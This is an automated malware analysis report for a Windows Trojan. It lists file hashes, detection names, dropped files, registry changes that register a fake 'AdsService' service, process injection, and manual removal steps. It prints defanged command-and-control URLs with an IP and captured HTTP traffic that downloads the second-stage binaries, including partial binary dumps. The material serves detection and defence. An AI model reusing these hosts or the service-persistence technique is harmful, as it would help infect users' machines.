Trojan.Win32.FlyStudio_6c877d78dc

by malwarelabrobot on August 1st, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6183 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!6C877D78DC65 (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0PGE17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6c877d78dc6550ff99e7d85f869890f8
SHA1: e4dfd8b1611935f3550bf82c84ae0c39dc29ebea
SHA256: 157db1a18ea0a09f12c46c0c9672775a133f36ae1d29423844b4bf9ca1d84617
SSDeep: 6144:MHPJ417Frt OOLt2n75z0PGaogLfSaAONTKJmwObfo:2PmDqL8n75zYGWr9nTjfo
Size: 340496 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:29:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2792

The Trojan injects its code into the following process(es):

tip.exe:2620

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (52215 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (147569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (37968 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (182553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (0 bytes)

Registry activity

The process %original file name%.exe:2792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\services\AdsService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdsServiceGroup" = "AdsService"

[HKLM\System\CurrentControlSet\services\AdsService]
"Description" = "AdsService"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tip.exe:2620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@A7B3.tmp,"

Dropped PE files

MD5 File path
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@A7B3.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241331 241664 4.55836 28d93a4866fee5e9c04a67655040d2ed
.rdata 245760 77038 77312 3.73342 3ed56b57cc626764796f03bdab466f39
.data 323584 9556 6144 2.76591 f2a1c0bf0a7b50b83d143a7502cd2aa5
.tls 335872 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 339968 488 512 3.30333 84e66ff2e405d01acdebe7444e41161c
.reloc 344064 12820 13312 4.49439 21abc5d2a6af9a076e50bf1671f700e0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 49
0993637493f3b7d48e60406846b67cd2
c956d2c7fa36d0ba89ddd2d08eb125c0
e61208cc06a25e7c20997d3df2fd96af
48e84a33b3f68118827b19b9e16065b4
519d3ab72d9e2ddb79915b69f80b01e3
c646ba2d5b31022755f541bd53e39091
41c67c94264f010fc864fde2fc098943
ebcdb9937183cb98c2cd8cbd4f7d03a9
6d4a6258ece2a1cf6c4d23b1f7496b96
c6024442bd5845451b148ec9be753958
9530568a4d91dacde5624af32cb71c99
7647547a01c96cc56169723bb0b3d7ea
52161eee9520766f6392ccda71c560b3
e5f865c19ad6cf3f794e0f029c15624b
304af875e6866b72f93e4e0b14152468
c340bcab1f0e3da360a6c676dfca920f
866a663983df6eb9f173e738b7492af5
fe1190b636e01304dfea8c5985a676ae
fff5b97e7de8f602d3d0749880184afe
6dcfa3790537394ba27309980b26c6a9
b3b68d037f5ada39b8c815e7763963ef
559815f0958d0d56ef805ac06a4ecea4
2129f218596a99ecf0b8bc9930ce2f05
f490d78f241cef804d76dbc508da32cf
fdd3c156fcf06e0a8d1811f88c679446
06626e0fe5c2fbc2845f7c5f7c95ce81

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
hxxp://api.knsdknknndnfjenkjwwlekfj.com/api/send 108.61.212.148
hxxp://api.knsdknknndnfjenkjwwlekfj.com/api/list 108.61.212.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /api/send HTTP/1.1
Server: VXBOX34EeksXf0oipic0hNrit2K3K0Mkc0oijOt2Lny0Y3jXsiMEpEu0IXnEzX4Ejkc3oAriKncOC2oOBOXXe0jiLEMXLXE3zXvkf0eiBOvNKncOC2aNm20XpiDkIXME4Xa3uiqECkmEarvNoOuXoEg3IEmXunt2arkEpibkoiQEjiCEYkCkmEarA3oOK3LiMkpiu0C2t2hNd0K0U3L04ELimkoioApOBAhNLnC2oOm2GXLiCXCkoArioOK3LifEv3u0jOhroAb3tk90giLEjkeim26AoOMAYrKnBOFXKEckmXoiMX33tkjECkLnrioOBOhNYrBALnokQEfkIiIEmXe0oAriKnLnoAUAKnm2uij0C0mXarWrhrhNlEXicrn0cOMAcnfOqrQAQAWNe2M2jNMAprOi42lke2u2QOcAcr4A424Nu2EE4nq2z2cNN3oAUAKnarC3zXfkMif3oiQXBOA3t2BOhNYrKnhNcXoEc0QXBOrit2hNm2jOoOhNv0rDcXLELnvNKneOfNBALne3piCkQELnriKnhNBOC2hrarp04XAFQ0oiBOvNoOeNunt2LnI3mXIXm2pOBAhN1EYkYiC0fkpEIEoOqABA9kpAcnarNG
Server-Key: rANO2nylEX0ki37Zd8xGFDTb51wHRPSJhBaotKmLCusgYUfjzMecQIq4vpW6V9
User-Agent: winnet http client v1.0
Host: api.knsdknknndnfjenkjwwlekfj.com
Connection: Keep-Alive


HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:38 GMT
Content-Length: 11
Bad Request..



GET /api/report HTTP/1.1
Server: D5JMzSN39ScSleF8PTJMY2BPW3iSceK31HigZ5hTV8kyD8X2k8KgNPRMW3YHcSheNPs2Vy4yK3iSXPD2LeR8JMc8iPXTDSqSLeF8HgB2lyCyieV5iTigJMHgCyMg85Nyy5XMB8R8lMX2BPBP1HX2qHlMRy4M3SRPvSR8jPYHNMVMR8NyN8c2vSk8RHqPXyv3JML2iP13igReiPzMW2A395aTiTjT15RSJPqyJPPfGMByCyyd
Server-Key: HPyM82wv35eSgTbtonEdIfrQ7A60mxOuCJZiKhFWcL9pjalUVNRXBqkY1z4GDs
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: bN94gzXtuSH8C7wvLEqcJBY1MxGPWpRrndFaQ25emO3sThk6IUolDjVfyKZi0A
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:24 GMT
[DATA]bN94gzXtuSH8C7wvLEqcJBY1MxGPWpRhHCHkHi9aHCHAHCHI9CHAHCHvHCHkHi9A
Hi9f9CHI9CH7HCHIHCHvHCHsHi9kHi9SHCHvHCHIHCHIHCHI9CHOHCHvHCHkHi9AHi9kHi
9KHCH8HCHuHCH7HCHTHCH2HCHI9CHAHCHvHCHXHi9KHCHI9CHAHCHI9CHkHi9V9jHrndFa
Q25emO3sThk6IUolDjVfyKZi0A[DATA]HTTP/1.1 200 OK..Cache-Control: no-cac
he..Pragma: no-cache..Content-Length: 242..Content-Type: text/plain; c
harset=Windows-1252..Expires: -1..Server: Microsoft-IIS/8.5..Server-Ke
y: bN94gzXtuSH8C7wvLEqcJBY1MxGPWpRrndFaQ25emO3sThk6IUolDjVfyKZi0A..X-A
spNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Mon, 31 Jul 201
7 12:54:24 GMT..[DATA]bN94gzXtuSH8C7wvLEqcJBY1MxGPWpRhHCHkHi9aHCHAHCHI
9CHAHCHvHCHkHi9AHi9f9CHI9CH7HCHIHCHvHCHsHi9kHi9SHCHvHCHIHCHIHCHI9CHOHC
HvHCHkHi9AHi9kHi9KHCH8HCHuHCH7HCHTHCH2HCHI9CHAHCHvHCHXHi9KHCHI9CHAHCHI
9CHkHi9V9jHrndFaQ25emO3sThk6IUolDjVfyKZi0A[DATA]....


GET /api/ip HTTP/1.1


User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:35 GMT
Content-Length: 71
{"ip":"194.242.96.218","iso_code":"UA","en":"Ukraine","cn":"........."
}..



GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 25 Jul 2017 06:54:09 GMT
Accept-Ranges: bytes
ETag: "461abfd0125d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:23 GMT
Content-Length: 974336
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
....|o......|o..U...|o......[.......[.......[.........d.............s.
......s.......s.......Rich............................PE..L.....vY....
.......!.....X...........".......p............................... ....
........@.........................PF.......F..........................
.........o......8...........................H...@............p........
.......................text....V.......X.................. ..`.rdata..
.....p.......\..............@..@.data...x:...`...(...D..............@.
...tls.................l..............@....reloc...o.......p...n......
........@..B..........................................................
......................................................................
......................................................................
......................................................................
.............................................P....fJ..h.d....`........
.d.........P.....#...Y......................&J..h.d...................
...............Y.......................I..h.d.........................
.........Y.......................I..h.d..............................c
...Y......................fI..j.h.....................................
J1..h.e.......Y......................I..j.h...........................
...........0..h e.......Y................ .....H..j.h..... .....0.....
....4......... ......0..h@e...r...Y................8....vH..j.h...
<<< skipped >>>

GET /tip.bin HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:29 GMT
Content-Length: 304640
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........;...U...U.
..U...Y...U.m.[...U..._.U.U...^...U...F...U...F...U...T...U...^...U...
_...U...U...U.).S...U.Rich..U.........................PE..L....DKY....
................. .......|............@...............................
......................................................................
......................................................................
......................UPX0....................................UPX1....
............................@....rsrc.... ..........................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....h./wb<.j.Y.......P..&$...m..3...U..h....j.h...j
...o..i...h.R....@......$..m..(.....@..]..m...&..}.f.E....f.E..m..}m..
...$..U.M^.Ku...\..v........e....g9"t.....h..a...`5J.Q...K.d.5h..h0...
.q...W....]...{{.w..]..t.....e. ...M..`.D.l@j.j.G.....y.....-...{(l...
.%......G......k).Z4...P..d! C...."I*C.@_.P.... *.h..$9hx.L._..u...%.=
...d..u.J.....t..g....A..t;.u.......~.....3............t..A.L&..t...p.
.....t....A. ........s.*..@... ..<$Q.E..{.W.u......QW.Y..W.......Iu
.zS[.X..7E..$W.UV...2.....H;..^<...XA....6(.....f..9..gp .v<
<<< skipped >>>


GET /api/list HTTP/1.1
User-Agent: restclient for cpp v1.0
Host: api.knsdknknndnfjenkjwwlekfj.com
Connection: Keep-Alive


HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:34 GMT
Content-Length: 11
Bad Request..

The Trojan connects to the servers at the folowing location(s):

svchost.exe_2972:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_2620:

`.rsrc
t$(SSh
~%UVW
u$SShe
Bv.SCv=kAv
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)

tip.exe_2620_rwx_00401000_000B6000:

t$(SSh
~%UVW
u$SShe
Bv.SCv=kAv
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2792

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (52215 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (147569 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (37968 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (182553 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now